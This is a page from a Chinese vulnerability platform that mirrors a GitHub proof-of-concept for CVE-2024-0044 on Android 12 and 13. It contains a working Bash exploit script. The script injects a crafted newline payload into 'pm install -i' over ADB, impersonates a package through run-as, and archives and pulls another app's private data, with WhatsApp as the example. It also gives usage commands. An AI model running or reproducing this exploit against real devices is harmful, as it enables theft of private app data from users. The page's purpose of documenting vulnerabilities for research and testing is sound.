漏洞平台

POC详情： 56d73b4d6fdd63fb428ff1705dbb84d662f54e2a

来源

https://github.com/Dit-Developers/CVE-2024-0044-

关联漏洞

标题： Google Android 安全漏洞 (CVE-2024-0044)
描述：Google Android是美国谷歌（Google）公司的一套以Linux为基础的开源操作系统。 Google Android 存在安全漏洞，该漏洞源于 PackageInstallerService.java 文件的 createSessionInternal 方法存在输入验证不当，可能会以任何应用程序的方式运行。

描述

CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13

介绍

# CVE-2024-0044-
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13

# CVE-2024-0044 Exploit Script

This Bash script demonstrates how to exploit CVE-2024-0044. **For educational and testing purposes only.**

## Prerequisites
- ADB (Android Debug Bridge) installed and configured
- A connected Android device with USB debugging enabled

## Script Code
```bash
#!/bin/bash

# Function to exploit CVE-2024-0044
exploit_cve_2024_0044() {
    local url=$1
    local package_name=$2
    local apk_path=$3

    # Generate payload
    local payload="PAYLOAD=\"@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"

    # Push APK to device
    adb push "$apk_path" /data/local/tmp/

    # Execute payload
    adb shell <<< "$payload"

    # Create temporary directory
    adb shell "mkdir /data/local/tmp/wa/"
    adb shell "touch /data/local/tmp/wa/wa.tar"
    adb shell "chmod -R 0777 /data/local/tmp/wa/"

    # Archive target application's data
    adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"

    # Pull data
    adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
}

# Usage
if [[ $# -ne 3 ]]; then
    echo "Usage: $0 <url> <package_name> <apk_path>"
    echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
    exit 1
fi

exploit_cve_2024_0044 "$1" "$2" "$3"
```
## commands
```bash
chmod +x exploit_cve_2024_0044.sh
./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>
```

### Parameters
- Replace `https://web.whatsapp.com/` with the actual target URL.
- Replace `com.whatsapp` with the target package name.
- Replace `/path/to/apk.apk` with the path to the APK file.

文件快照


 [4.0K]  /data/pocs/56d73b4d6fdd63fb428ff1705dbb84d662f54e2a
├── [1.0K]  exploit_cve_2024_0044.sh
└── [1.7K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。